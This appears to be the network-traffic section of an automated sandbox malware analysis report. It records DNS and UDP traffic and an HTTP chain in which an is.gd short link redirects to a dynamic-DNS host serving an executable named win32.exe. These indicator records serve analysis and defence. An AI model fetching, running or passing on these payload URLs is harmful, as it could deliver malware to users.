Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
is.gd | 104.25.234.53 | |
rkkrstdygorgiousejtw.dns.army | 103.125.191.187 |
- UDP Requests
-
-
192.168.56.101:59369 164.124.101.2:53
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:59370 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
192.168.56.101:62449 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
301
https://is.gd/lFvIp1
REQUEST
RESPONSE
BODY
GET /lFvIp1 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: is.gd
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Date: Wed, 31 Mar 2021 09:18:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d89fb26daa4248b267f59bedb5aa252231617182321; expires=Fri, 30-Apr-21 09:18:41 GMT; path=/; domain=.is.gd; HttpOnly; SameSite=Lax; Secure
Location: http://rkkrstdygorgiousejtw.dns.army/receiprt/win32.exe
CF-Cache-Status: DYNAMIC
cf-request-id: 09292d02f6000036301b374000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=6JzmLyCVk0JbVbOx%2BnWEtQV6B0VK5G65%2F2kJnqv5YPNCVgeztRCL389u8qfoQKeeWeXLC0nN9zo7s6XHZe0OeJ4XQ%2Bj31A%3D%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 63887de4b8403630-LAX
GET
200
http://rkkrstdygorgiousejtw.dns.army/receiprt/win32.exe
REQUEST
RESPONSE
BODY
GET /receiprt/win32.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Connection: Keep-Alive
Host: rkkrstdygorgiousejtw.dns.army
HTTP/1.1 200 OK
Date: Wed, 31 Mar 2021 09:18:40 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34
Last-Modified: Sat, 31 Mar 2012 01:13:19 GMT
ETag: "b8c00-4bc7fa9a6d4dd"
Accept-Ranges: bytes
Content-Length: 756736
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts